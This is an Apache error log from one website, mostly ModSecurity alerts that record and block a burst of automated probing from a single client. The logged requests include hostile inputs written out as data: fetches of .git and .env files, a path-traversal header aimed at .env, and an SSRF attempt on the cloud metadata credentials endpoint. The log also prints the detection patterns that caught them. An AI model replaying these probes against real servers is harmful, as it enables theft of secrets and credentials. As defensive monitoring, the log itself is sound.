[Tue May 12 05:10:17.830185 2026] [ssl:error] [pid 1808852:tid 1808879] (EAI 2)Name or service not known: [client 199.45.155.97:31128] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:10:17.830227 2026] [ssl:error] [pid 1808852:tid 1808879] AH01941: stapling_renew_response: responder error
[Tue May 12 05:10:22.136462 2026] [ssl:error] [pid 1730175:tid 1730177] (EAI 2)Name or service not known: [client 199.45.155.97:31164] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:10:22.136502 2026] [ssl:error] [pid 1730175:tid 1730177] AH01941: stapling_renew_response: responder error
[Tue May 12 05:10:22.444954 2026] [ssl:error] [pid 1825287:tid 1825305] (EAI 2)Name or service not known: [client 199.45.155.97:31184] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:10:22.444996 2026] [ssl:error] [pid 1825287:tid 1825305] AH01941: stapling_renew_response: responder error
[Tue May 12 05:10:31.906373 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agKaJ3o6NvB9WXx5V-6nGgAAAQE"]
[Tue May 12 05:10:31.906374 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.246:21460] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/backend/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69FAAAAUE"]
[Tue May 12 05:10:31.906374 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJ9r1yOh9TvizeziYuQAAAEc"]
[Tue May 12 05:10:31.906374 2026] [security2:error] [pid 1730207:tid 1730216] [client 45.148.10.246:21488] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production.local"] [unique_id "agKaJzue9Sp-pIv_Bb69FwAAAUc"]
[Tue May 12 05:10:31.906384 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJwgpmE1yW0glLdgnhAAAANc"]
[Tue May 12 05:10:31.906513 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agKaJ3o6NvB9WXx5V-6nGgAAAQE"]
[Tue May 12 05:10:31.906514 2026] [:error] [pid 1730207:tid 1730219] [client 45.148.10.246:21520] File does not exist: /home/ixinabou/public_html/info.php
[Tue May 12 05:10:31.906519 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.246:21460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/backend/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69FAAAAUE"]
[Tue May 12 05:10:31.906524 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJ9r1yOh9TvizeziYuQAAAEc"]
[Tue May 12 05:10:31.906540 2026] [security2:error] [pid 1730207:tid 1730216] [client 45.148.10.246:21488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production.local"] [unique_id "agKaJzue9Sp-pIv_Bb69FwAAAUc"]
[Tue May 12 05:10:31.906549 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJwgpmE1yW0glLdgnhAAAANc"]
[Tue May 12 05:10:31.906734 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agKaJ3o6NvB9WXx5V-6nGgAAAQE"]
[Tue May 12 05:10:31.906740 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.246:21460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/backend/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69FAAAAUE"]
[Tue May 12 05:10:31.906747 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJ9r1yOh9TvizeziYuQAAAEc"]
[Tue May 12 05:10:31.906761 2026] [security2:error] [pid 1730207:tid 1730216] [client 45.148.10.246:21488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production.local"] [unique_id "agKaJzue9Sp-pIv_Bb69FwAAAUc"]
[Tue May 12 05:10:31.906767 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJwgpmE1yW0glLdgnhAAAANc"]
[Tue May 12 05:10:31.906856 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.246:21506] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/refs/heads/main"] [unique_id "agKaJ81tk6y7yBJLpJozJAAAAI4"]
[Tue May 12 05:10:31.906971 2026] [security2:error] [pid 1820198:tid 1820210] [client 45.148.10.246:21582] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ixinabourgoin.fr"] [uri "/_next/image"] [unique_id "agKaJ81tk6y7yBJLpJozIwAAAIo"]
[Tue May 12 05:10:31.906993 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.246:21506] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/refs/heads/main"] [unique_id "agKaJ81tk6y7yBJLpJozJAAAAI4"]
[Tue May 12 05:10:31.907108 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/HEAD"] [unique_id "agKaJzue9Sp-pIv_Bb69FQAAAUk"]
[Tue May 12 05:10:31.907125 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJ3o6NvB9WXx5V-6nGwAAARY"]
[Tue May 12 05:10:31.907207 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJ3o6NvB9WXx5V-6nGwAAARY"]
[Tue May 12 05:10:31.907212 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.246:21506] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/refs/heads/main"] [unique_id "agKaJ81tk6y7yBJLpJozJAAAAI4"]
[Tue May 12 05:10:31.907223 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/HEAD"] [unique_id "agKaJzue9Sp-pIv_Bb69FQAAAUk"]
[Tue May 12 05:10:31.907247 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJ3o6NvB9WXx5V-6nGwAAARY"]
[Tue May 12 05:10:31.907418 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/HEAD"] [unique_id "agKaJzue9Sp-pIv_Bb69FQAAAUk"]
[Tue May 12 05:10:31.907429 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJ3o6NvB9WXx5V-6nGwAAARY"]
[Tue May 12 05:10:31.907491 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJ3o6NvB9WXx5V-6nGwAAARY"]
[Tue May 12 05:10:31.907537 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJ3o6NvB9WXx5V-6nGwAAARY"]
[Tue May 12 05:10:31.907659 2026] [security2:error] [pid 1820198:tid 1820210] [client 45.148.10.246:21582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/_next/image"] [unique_id "agKaJ81tk6y7yBJLpJozIwAAAIo"]
[Tue May 12 05:10:31.907873 2026] [security2:error] [pid 1820198:tid 1820210] [client 45.148.10.246:21582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/_next/image"] [unique_id "agKaJ81tk6y7yBJLpJozIwAAAIo"]
[Tue May 12 05:10:31.907874 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJ3o6NvB9WXx5V-6nGwAAARY"]
[Tue May 12 05:10:31.908104 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJ3o6NvB9WXx5V-6nGwAAARY"]
[Tue May 12 05:10:31.923448 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.old"] [unique_id "agKaJwgpmE1yW0glLdgniAAAANc"]
[Tue May 12 05:10:31.923513 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.246:21460] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKaJzue9Sp-pIv_Bb69GAAAAUE"]
[Tue May 12 05:10:31.923560 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.old"] [unique_id "agKaJwgpmE1yW0glLdgniAAAANc"]
[Tue May 12 05:10:31.923634 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.246:21460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKaJzue9Sp-pIv_Bb69GAAAAUE"]
[Tue May 12 05:10:31.923739 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.old"] [unique_id "agKaJwgpmE1yW0glLdgniAAAANc"]
